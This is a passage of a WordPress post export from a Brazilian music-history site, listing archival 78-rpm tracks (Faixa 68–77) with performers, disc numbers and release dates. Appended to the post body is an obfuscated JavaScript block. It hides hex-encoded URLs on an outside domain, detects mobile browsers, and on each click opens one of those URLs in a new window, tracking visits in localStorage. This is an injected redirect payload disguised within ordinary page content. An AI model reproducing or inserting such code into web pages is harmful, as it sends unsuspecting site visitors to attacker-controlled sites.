1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/68-33395-B_A_morte_de_Joao_Pessoa.mp3\">Faixa 68<\/a><\/p>\n\n\n\n<p><em>A morte de Jo\u00e3o Pessoa<\/em>. Moda de viola gravada pelo Zico Dias e pelo Ferrinho, disco Victor n. 33395-B, de autoria de Zico Dias e Ferrinho, lan\u00e7ada em dezembro de 1930.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/69-20006-A_Jorginho_do_sertao.mp3\">Faixa 69<\/a><\/p>\n\n\n\n<p><em>Jorginho do sert\u00e3o<\/em>. Moda de viola gravada pelo Corn\u00e9lio Pires (?), disco Columbia n. 20006-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em outubro de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/70-4079-A_A_madrugada.mp3\">Faixa 70<\/a><\/p>\n\n\n\n<p><em>A madrugada<\/em>. Moda de viola gravada pelo Laureano e pelo Soares, disco Arte-fone n. 4079-A, de autoria de Laureano e Soares, lan\u00e7ada entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/71-10100_A_Nao_quero_saber_mais_dela.mp3\">Faixa 71<\/a><\/p>\n\n\n\n<p><em>N\u00e3o quero saber mais dela<\/em>. Samba gravado pelo Francisco Alves e pela Rosa Negra, disco Odeon n. 10100-A, de autoria de Sinh\u00f4, lan\u00e7ado em janeiro de 1928.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/72-33444-A_No_rancho_fundo.mp3\">Faixa 72<\/a><\/p>\n\n\n\n<p><em>No rancho fundo<\/em>. Samba-can\u00e7\u00e3o gravado pela Elisa Coelho, disco Victor n. 33444-A, de autoria de Ary Barroso e Lamartine Babo, lan\u00e7ado em agosto de 1931.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/73-20001-A_Trecho_2_Rebatidas_de_caipiras.mp3\">Faixa 73<\/a><\/p>\n\n\n\n<p><em>Rebatidas de caipiras (trecho)<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20001-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em maio de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/74-20047-B_Qui-pro-quo_Trecho_2.mp3\">Faixa 74<\/a><\/p>\n\n\n\n<p><em>Qui-pro-qu\u00f3 (trecho)<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20047-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada provavelmente em 1930.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/75-20012-A_Puxando_a_brasa.mp3\">Faixa 75<\/a><\/p>\n\n\n\n<p><em>Puxando a brasa<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20001-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em maio de 1929.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/76-4038-A_e_B_Salada_Internacional_I_e_II.mp3\">Faixa 76<\/a><\/p>\n\n\n\n<p><em>Salada Internacional I e II<\/em>. Humorismo, gravado pelo Nabor Pires Camargo e Cherubim, disco Arte-fone 4038, sem indica\u00e7\u00e3o de autoria, lan\u00e7ado provavelmente entre 1931 e fins de 1932.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.memoriadamusica.com.br\/site\/images\/audio\/Camila\/77-Selecao_de_simplicidades_caipiras.mp3\">Faixa 77<\/a><\/p>\n\n\n\n<p>Sele\u00e7\u00e3o de \u201csimplicidades caipiras\u201d<\/p>\n\n\n\n<p><em>Simplicidades<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20002-A, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em maio de 1929.<\/p>\n\n\n\n<p><em>Numa escola sertaneja<\/em>. Anedota gravada pelo Corn\u00e9lio Pires, disco Columbia n. 20002-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em maio de 1929.<\/p>\n\n\n\n<p><em>Uma li\u00e7\u00e3o complicada<\/em>. Anedota gravada pelo Gen\u00e9sio Arruda e Corn\u00e9lio Pires, disco Columbia n. 20011-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em outubro de 1929.<\/p>\n\n\n\n<p><em>Prantaforma do prefeito.&nbsp;<\/em>Anedota gravada pelo Corn\u00e9lio Pires e Gen\u00e9sio Arruda, disco Columbia n. 20027-B, sem indica\u00e7\u00e3o de autoria, lan\u00e7ada em junho de 1930.<\/p>\n\n\n\n<p><em>Passeio a\u00e9reo<\/em>. Humorismo, gravado pelo Pl\u00ednio Ferraz e Jo\u00e3o Michalany, disco Victor n. 33422-A, de autoria de Pl\u00ednio Ferraz, lan\u00e7ada provavelmente em 1931.<\/p>\n\n\n\n<p><em>As tr\u00eas l\u00e1grimas<\/em>. Sem indica\u00e7\u00e3o de g\u00eanero, interpretada por Gen\u00e9sio Arruda, disco Columbia n. 20012-B, de autoria de Campos Negreiro, lan\u00e7ada em outubro de 1929.<\/p>\n\n\n\n<p><em>Cururu paulista<\/em>. Cururu gravado pelo Zico Dias e pelo Ferrinho, disco Victor n. 33796-B, de autoria de Zico Dias e Ferrinho, lan\u00e7ado em julho de 1934.&nbsp;<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x4b\\x47\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x76\\x53\\x52\\x35\\x63\\x375','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x45\\x75\\x6c\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x53\\x77\\x50\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x6d\\x73\\x34\\x63\\x324','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x78\\x56\\x57\\x37\\x63\\x347','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x44\\x70\\x68\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x64\\x79\\x47\\x36\\x63\\x326','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x79\\x73\\x54\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x65\\x73\\x50\\x31\\x63\\x351',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00c1UDIO 1. Introdu\u00e7\u00e3o Faixa 1&nbsp;&nbsp; &nbsp; &nbsp; &nbsp;&nbsp; Saci. Polca gravada pelo Grupo do Canhoto, disco Odeon n. 120589, de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[12],"tags":[],"class_list":["post-1696","post","type-post","status-publish","format-standard","hentry","category-livros"],"_links":{"self":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1696","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=1696"}],"version-history":[{"count":0,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/posts\/1696\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=1696"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=1696"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.memoriadamusica.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=1696"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}